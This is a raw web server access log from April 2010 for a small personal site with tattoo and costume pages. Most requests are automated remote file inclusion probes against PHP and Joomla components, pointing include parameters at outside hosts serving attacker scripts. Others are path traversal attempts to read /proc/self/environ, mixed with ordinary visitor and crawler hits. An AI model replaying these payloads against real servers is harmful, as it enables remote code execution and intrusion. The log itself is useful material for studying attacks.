211.174.185.131 - - [26/Apr/2010:11:30:17 -0500] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.174.185.131 - - [26/Apr/2010:11:30:17 -0500] "GET /logs/access_log.1248652800//com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
210.127.253.75 - - [26/Apr/2010:11:30:59 -0500] "GET /logs/access_log.1220054400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 374 "-""libwww-perl/5.826"
210.127.253.75 - - [26/Apr/2010:11:30:59 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 347 "-""libwww-perl/5.826"
210.127.253.75 - - [26/Apr/2010:11:31:00 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 352 "-""libwww-perl/5.826"
64.34.165.224 - - [26/Apr/2010:11:32:53 -0500] "GET /mcf.php?content=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""oi"
64.34.165.224 - - [26/Apr/2010:11:32:53 -0500] "GET /logs/mcf.php?content=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""oi"
64.34.165.224 - - [26/Apr/2010:11:32:53 -0500] "GET /logs/access_log.1212969600/mcf.php?content=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 318 "-""oi"
68.233.9.242 - - [26/Apr/2010:11:33:44 -0500] "GET /logs/access_log.1219708800//?path%5Bdocroot%5D=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.833"
68.233.9.242 - - [26/Apr/2010:11:33:44 -0500] "GET //?path%5Bdocroot%5D=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 200 1003 "-""libwww-perl/5.833"
68.233.9.242 - - [26/Apr/2010:11:33:44 -0500] "GET /logs//?path%5Bdocroot%5D=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 200 3223 "-""libwww-perl/5.833"
68.233.9.242 - - [26/Apr/2010:11:34:27 -0500] "GET /logs/access_log.1212969600//?path%5Bdocroot%5D=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.833"
64.34.165.224 - - [26/Apr/2010:11:34:29 -0500] "GET /mcf.php?content=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""oi"
64.34.165.224 - - [26/Apr/2010:11:34:30 -0500] "GET /logs/mcf.php?content=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""oi"
64.34.165.224 - - [26/Apr/2010:11:34:30 -0500] "GET /logs/access_log.1212969600/mcf.php?content=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 318 "-""oi"
85.26.183.91 - - [26/Apr/2010:11:34:55 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 32768 "http://images.google.ru/imglanding?q=old%20school%20tattoo&imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__AO0FvGK9HMesLgcRkTamceHKDUc=&h=364&w=405&sz=67&hl=ru&sig2=AKVJ_ezpH1krWYx02WJFsA&um=1&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dold%2Bschool%2Btattoo%26tbnid%3D9SpwlRwh0wlLlM%26tbnh%3D0%26tbnw%3D0%26um%3D1%26hl%3Dru%26lr%3D%26newwindow%3D1%26client%3Dsafari%26sa%3DX%26rls%3Den%26imgtype%3Di_similar%26tbs%3Disch:1&ei=tr_VS96PFsSUsgar-cwl&tbnid=9SpwlRwh0wlLlM&tbnh=0&tbnw=0&um=1&lr=&newwindow=1&client=safari&sa=X&rls=en&imgtype=i_similar&tbs=isch:1&start=16""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
85.26.183.91 - - [26/Apr/2010:11:35:20 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
212.241.177.123 - - [26/Apr/2010:11:35:33 -0500] "GET ///index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
212.241.177.123 - - [26/Apr/2010:11:35:33 -0500] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
212.241.177.123 - - [26/Apr/2010:11:35:33 -0500] "GET /logs/access_log.1265155200///index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
212.241.177.123 - - [26/Apr/2010:11:35:34 -0500] "GET /logs/access_log.1265760000///index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.26.183.91 - - [26/Apr/2010:11:35:46 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tat-cd1.jpg""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
89.111.176.206 - - [26/Apr/2010:11:38:02 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.ogc.gen.tr/alb.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
207.46.199.55 - - [26/Apr/2010:11:40:55 -0500] "GET /logs/access_log.1193097600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.175.239.226 - - [26/Apr/2010:11:41:14 -0500] "GET ///index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
200.175.239.226 - - [26/Apr/2010:11:41:14 -0500] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
200.175.239.226 - - [26/Apr/2010:11:41:14 -0500] "GET /logs/access_log.1265155200///index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
200.175.239.226 - - [26/Apr/2010:11:41:19 -0500] "GET /logs/access_log.1265760000///index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.141.89.188 - - [26/Apr/2010:11:45:10 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
168.143.19.89 - - [26/Apr/2010:11:46:04 -0500] "GET /logs/access_log.1219708800///components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=ftp://203.36.43.171/v6id.txt??%0D?? HTTP/1.1" 404 357 "-""libwww-perl/5.825"
168.143.19.89 - - [26/Apr/2010:11:46:08 -0500] "GET ///components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=ftp://203.36.43.171/v6id.txt??%0D?? HTTP/1.1" 404 330 "-""libwww-perl/5.825"
168.143.19.89 - - [26/Apr/2010:11:46:08 -0500] "GET /logs///components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=ftp://203.36.43.171/v6id.txt??%0D?? HTTP/1.1" 404 335 "-""libwww-perl/5.825"
67.210.126.140 - - [26/Apr/2010:11:47:07 -0500] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""oi"
67.210.126.140 - - [26/Apr/2010:11:47:07 -0500] "GET /logs/main.php?sayfa=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""oi"
67.210.126.140 - - [26/Apr/2010:11:47:07 -0500] "GET /logs/access_log.1229731200/main.php?sayfa=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""oi"
78.110.50.139 - - [26/Apr/2010:11:48:28 -0500] "GET //includes/kb_constants.php?module_root_path=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:11:48:28 -0500] "GET /logs//includes/kb_constants.php?module_root_path=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:11:48:29 -0500] "GET /logs/access_log.1210809600//includes/kb_constants.php?module_root_path=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:11:48:48 -0500] "GET //includes/kb_constants.php?module_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:11:48:48 -0500] "GET /logs//includes/kb_constants.php?module_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:11:48:48 -0500] "GET /logs/access_log.1210809600//includes/kb_constants.php?module_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
216.129.119.10 - - [26/Apr/2010:11:50:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
64.34.165.224 - - [26/Apr/2010:11:52:24 -0500] "GET /mcf.php?content=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""oi"
64.34.165.224 - - [26/Apr/2010:11:52:25 -0500] "GET /logs/mcf.php?content=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""oi"
64.34.165.224 - - [26/Apr/2010:11:52:25 -0500] "GET /logs/access_log.1212969600/mcf.php?content=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 318 "-""oi"
67.218.116.132 - - [26/Apr/2010:11:56:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
211.172.232.251 - - [26/Apr/2010:11:58:27 -0500] "GET /logs/access_log.1219708800//?path%5Bdocroot%5D=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
211.172.232.251 - - [26/Apr/2010:11:58:28 -0500] "GET //?path%5Bdocroot%5D=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
211.172.232.251 - - [26/Apr/2010:11:58:29 -0500] "GET /logs//?path%5Bdocroot%5D=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 200 3223 "-""libwww-perl/5.79"
211.172.232.251 - - [26/Apr/2010:11:59:07 -0500] "GET /logs/access_log.1212969600//?path%5Bdocroot%5D=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
78.110.50.139 - - [26/Apr/2010:11:59:19 -0500] "GET /logs/access_log.1225238400//mcf.php?content=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:11:59:19 -0500] "GET /logs//mcf.php?content=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:11:59:19 -0500] "GET //mcf.php?content=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:11:59:50 -0500] "GET //mcf.php?content=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:11:59:50 -0500] "GET /logs/access_log.1225238400//mcf.php?content=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:11:59:50 -0500] "GET /logs//mcf.php?content=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
211.172.232.251 - - [26/Apr/2010:12:00:53 -0500] "GET /logs/access_log.1219708800//?path%5Bdocroot%5D=http://www2.beppegrillo.it//eng/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
211.172.232.251 - - [26/Apr/2010:12:00:53 -0500] "GET //?path%5Bdocroot%5D=http://www2.beppegrillo.it//eng/id.txt???? HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
211.172.232.251 - - [26/Apr/2010:12:00:54 -0500] "GET /logs//?path%5Bdocroot%5D=http://www2.beppegrillo.it//eng/id.txt???? HTTP/1.1" 200 3223 "-""libwww-perl/5.79"
64.34.165.224 - - [26/Apr/2010:12:01:12 -0500] "GET /logs/access_log.1238803200/mcf.php?content=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 318 "-""oi"
78.110.50.139 - - [26/Apr/2010:12:01:14 -0500] "GET //mcf.php?content=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:12:01:14 -0500] "GET /logs/access_log.1212969600%20%20//mcf.php?content=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:12:01:14 -0500] "GET /logs//mcf.php?content=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:12:01:24 -0500] "GET /logs/access_log.1212969600%20%20//mcf.php?content=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:12:01:24 -0500] "GET /logs//mcf.php?content=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:12:01:24 -0500] "GET //mcf.php?content=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:12:01:31 -0500] "GET /logs/access_log.1225929600//mcf.php?content=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:12:01:31 -0500] "GET /logs//mcf.php?content=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:12:01:31 -0500] "GET //mcf.php?content=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
211.172.232.251 - - [26/Apr/2010:12:01:33 -0500] "GET /logs/access_log.1212969600//?path%5Bdocroot%5D=http://www2.beppegrillo.it//eng/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
78.110.50.139 - - [26/Apr/2010:12:01:46 -0500] "GET /logs/access_log.1225929600//mcf.php?content=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:12:01:46 -0500] "GET /logs//mcf.php?content=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:12:01:46 -0500] "GET //mcf.php?content=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
210.127.253.75 - - [26/Apr/2010:12:02:05 -0500] "GET /logs/access_log.1219708800//?path%5Bdocroot%5D=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.826"
210.127.253.75 - - [26/Apr/2010:12:02:06 -0500] "GET //?path%5Bdocroot%5D=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 200 1003 "-""libwww-perl/5.826"
210.127.253.75 - - [26/Apr/2010:12:02:06 -0500] "GET /logs//?path%5Bdocroot%5D=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 200 3223 "-""libwww-perl/5.826"
64.34.165.224 - - [26/Apr/2010:12:02:17 -0500] "GET /logs/access_log.1238803200/mcf.php?content=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 318 "-""oi"
210.127.253.75 - - [26/Apr/2010:12:02:47 -0500] "GET /logs/access_log.1212969600//?path%5Bdocroot%5D=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.826"
78.110.50.139 - - [26/Apr/2010:12:03:37 -0500] "GET /logs/access_log.1212969600//mcf.php?content=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
98.103.104.194 - - [26/Apr/2010:12:03:56 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.bing.com/images/search?q=vintage+tatoos&FORM=BIFD""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.103.104.194 - - [26/Apr/2010:12:03:57 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.103.104.194 - - [26/Apr/2010:12:03:57 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.103.104.194 - - [26/Apr/2010:12:03:57 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.103.104.194 - - [26/Apr/2010:12:03:57 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
98.103.104.194 - - [26/Apr/2010:12:03:57 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
67.222.152.66 - - [26/Apr/2010:12:04:02 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:12:04:02 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:12:04:02 -0500] "GET /logs/access_log.1221696000//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:12:04:05 -0500] "GET /logs/access_log.1212969600//mcf.php?content=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
110.45.145.92 - - [26/Apr/2010:12:04:47 -0500] "GET /logs/access_log.1219708800//?path%5Bdocroot%5D=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
110.45.145.92 - - [26/Apr/2010:12:04:47 -0500] "GET //?path%5Bdocroot%5D=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
110.45.145.92 - - [26/Apr/2010:12:04:48 -0500] "GET /logs//?path%5Bdocroot%5D=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 200 3223 "-""libwww-perl/5.79"
110.45.145.92 - - [26/Apr/2010:12:05:57 -0500] "GET /logs/access_log.1212969600//?path%5Bdocroot%5D=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
210.109.97.196 - - [26/Apr/2010:12:08:47 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 351 "-""Mozilla/5.0"
210.109.97.196 - - [26/Apr/2010:12:08:47 -0500] "GET /logs/access_log.1220054400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 378 "-""Mozilla/5.0"
210.109.97.196 - - [26/Apr/2010:12:08:47 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 356 "-""Mozilla/5.0"
85.141.89.188 - - [26/Apr/2010:12:09:15 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 1.1.4322)"
64.141.49.2 - - [26/Apr/2010:12:09:59 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2; .NET CLR 2.0.50727)"
64.141.49.2 - - [26/Apr/2010:12:09:59 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2; .NET CLR 2.0.50727)"
210.109.97.196 - - [26/Apr/2010:12:10:00 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 356 "-""Mozilla/5.0"
210.109.97.196 - - [26/Apr/2010:12:10:00 -0500] "GET /logs/access_log.1220054400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 378 "-""Mozilla/5.0"
210.109.97.196 - - [26/Apr/2010:12:10:00 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 351 "-""Mozilla/5.0"
207.46.204.194 - - [26/Apr/2010:12:11:55 -0500] "GET /logs/access_log.1255219200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.142.208.158 - - [26/Apr/2010:12:14:23 -0500] "GET //errors.php?error=http://orelhas.pt/images/stories/id1??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
91.142.208.158 - - [26/Apr/2010:12:14:26 -0500] "GET /logs//errors.php?error=http://orelhas.pt/images/stories/id1??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
91.142.208.158 - - [26/Apr/2010:12:14:26 -0500] "GET /logs/access_log.1262563200//errors.php?error=http://orelhas.pt/images/stories/id1??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.129.119.43 - - [26/Apr/2010:12:16:11 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.13.137 - - [26/Apr/2010:12:18:25 -0500] "GET /logs/access_log.1169942400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.241.177.123 - - [26/Apr/2010:12:26:15 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
212.241.177.123 - - [26/Apr/2010:12:26:15 -0500] "GET /logs/access_log.1220054400%20%20/lostpasswd.php?env[include_prefix]=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
212.241.177.123 - - [26/Apr/2010:12:26:15 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
74.73.229.100 - - [26/Apr/2010:12:26:58 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://search.yahoo.com/search;_ylt=A0geu6tkzNVLpYQBlx5XNyoA?fr2=sg-gac&sado=1&p=bob%20shaw%20tattoo%20flash&fr=hp-psdt&pqstr=bob%20shaw%20tattoo&gprid=dXjcPftlTa6HLQwAkOdm4A&sac=1&sao=0""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
74.73.229.100 - - [26/Apr/2010:12:26:58 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
74.73.229.100 - - [26/Apr/2010:12:27:01 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
74.73.229.100 - - [26/Apr/2010:12:27:06 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
74.73.229.100 - - [26/Apr/2010:12:27:06 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
74.73.229.100 - - [26/Apr/2010:12:27:06 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
74.73.229.100 - - [26/Apr/2010:12:27:06 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
74.73.229.100 - - [26/Apr/2010:12:27:06 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30618; .NET CLR 3.5.30729)"
